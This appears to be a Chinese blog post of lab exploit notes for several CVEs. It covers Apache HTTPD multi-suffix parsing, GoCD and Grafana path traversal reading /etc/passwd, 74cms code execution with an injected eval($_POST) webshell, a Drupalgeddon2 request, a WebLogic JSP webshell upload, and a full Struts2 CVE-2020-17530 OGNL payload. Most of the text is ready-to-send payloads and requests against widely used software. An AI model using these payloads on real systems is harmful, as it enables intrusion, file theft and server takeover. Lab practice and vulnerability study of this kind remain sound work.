PTB-CVE

Apache HTTPD 多后缀解析漏洞

如果运维人员给.php后缀增加了处理器:
AddHandler application/x-httpd-php .php
那么,在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件,没必要是最后一个后缀。利用这个特性,将会造成一个可以绕过上传白名单的解析漏洞。

上传一个以jpg为后缀的一句话木马但是包含.php
在这里插入图片描述
会被成功解析成php
在这里插入图片描述

Tomcat WebSokcet 拒绝服务

GoCD 任意文件读取漏洞

GoCD 任意文件读取漏洞 (CVE-2021-43287) GoCD
一款先进的持续集成和发布管理系统,由ThoughtWorks开发。(不要和Google的编程语言Go混淆了!)其前身为CruiseControl,是ThoughtWorks在做咨询和交付交付项目时自己开发的一款开源的持续集成工具。后来随着持续集成及持续部署的火热,ThoughtWorks专门成立了一个项目组,基于Cruise开发除了Go这款工具。ThoughtWorks开源持续交付工具Go。使用Go来建立起一个项目的持续部署pipeline是非常快的,非常方便。
GoCD的v20.6.0 -
v21.2.0版本存在任意文件读取漏洞,可以通过/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd
对文件进行读取。

payload

http://127.0.0.1/go/add-on/business-continuity/api/plugin?folderName=&pluginName=…/…/…/etc/passwd

在这里插入图片描述

骑士cms任意代码执行

CVE-2020-35339
漏洞简介 迅易科技 74cms是中国迅易科技公司的一套基于PHP和MySQL的在线招聘系统。

74cms version 5.0.1
存在安全漏洞,该漏洞源于应用管理控制器ConfigController.class.php和ThinkPHP Common
functions.php存在远程代码执行漏洞,攻击者可利用该漏洞可以获得服务器权限并控制服务器。

登录后台 index.php?m=Admin
在这里插入图片描述

http://192.168.121.130/.',phpinfo(),'/.com

在这里插入图片描述
在这里插入图片描述
也可以写入一句话

http://192.168.121.130/.',eval($_POST[mzq]),'/.com

在这里插入图片描述

drupal 代码执行

漏洞简介 Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。

Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。以下版本受到影响:Drupal
7.58之前版本,8.3.9之前的8.x版本,8.4.6之前的8.4.x版本,8.5.1之前的8.5.x版本。 该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站
环境启动后,访问http://your-ip:8080/,会看到drupal安装页面。使用“标准”配置文件完成 drupal
安装。因为没有mysql环境,所以安装的时候要选择sqlite数据库。安装完成后,您就可以开始利用它了。

抓取注册页面上传图片的页面
在这里插入图片描述

修改数据包

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 776-52a2c3bf-ca8f-4a05-b626-ee5fb4786c64.do-not-trust.hacking.run
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=dir

在这里插入图片描述

weblogic 文件上传

访问漏洞点
/ws_utc/config.do
在这里插入图片描述
修改工作目录

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
上传jsp一句话
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Grafana 任意文件读取

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。

通过默认存在的插件来拼接文件路径构造请求进行文件读取

登录后拼接路径
在这里插入图片描述
查看使用插件

/api/plugins?embedded=0

在这里插入图片描述
利用插件来拼接文件路径构造请求进行文件读取

/public/plugins/alertlist/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd

在这里插入图片描述

struts2 代码执行

描述 CVE-2020-17530 漏洞简介 Apache
Struts是美国阿帕奇(Apache)基金会的一个开源项目,是一套用于创建企业级Java
Web应用的开源MVC框架,主要提供两个版本框架产品,Struts 1和Struts 2。

Struts 存在代码注入漏洞,攻击者可利用该漏洞可以通过强迫Struts的OGNL评估来使用漏洞来运行代码。

poc

%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ls /")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}

修改请求为post

POST /index.action HTTP/2
Host: 776-f31ac344-2a8d-49c2-93d4-2817de52b0f2.do-not-trust.hacking.run
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Length: 833


------WebKitFormBoundaryl7d1B1aGsV2wcZwF
Content-Disposition: form-data; name="id"


%{(#instancemanager=#application["org.apache.tomcat.InstanceManager"]).(#stack=#attr["com.opensymphony.xwork2.util.ValueStack.ValueStack"]).(#bean=#instancemanager.newInstance("org.apache.commons.collections.BeanMap")).(#bean.setBean(#stack)).(#context=#bean.get("context")).(#bean.setBean(#context)).(#macc=#bean.get("memberAccess")).(#bean.setBean(#macc)).(#emptyset=#instancemanager.newInstance("java.util.HashSet")).(#bean.put("excludedClasses",#emptyset)).(#bean.put("excludedPackageNames",#emptyset)).(#arglist=#instancemanager.newInstance("java.util.ArrayList")).(#arglist.add("ls /")).(#execute=#instancemanager.newInstance("freemarker.template.utility.Execute")).(#execute.exec(#arglist))}
------WebKitFormBoundaryl7d1B1aGsV2wcZwF--

在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值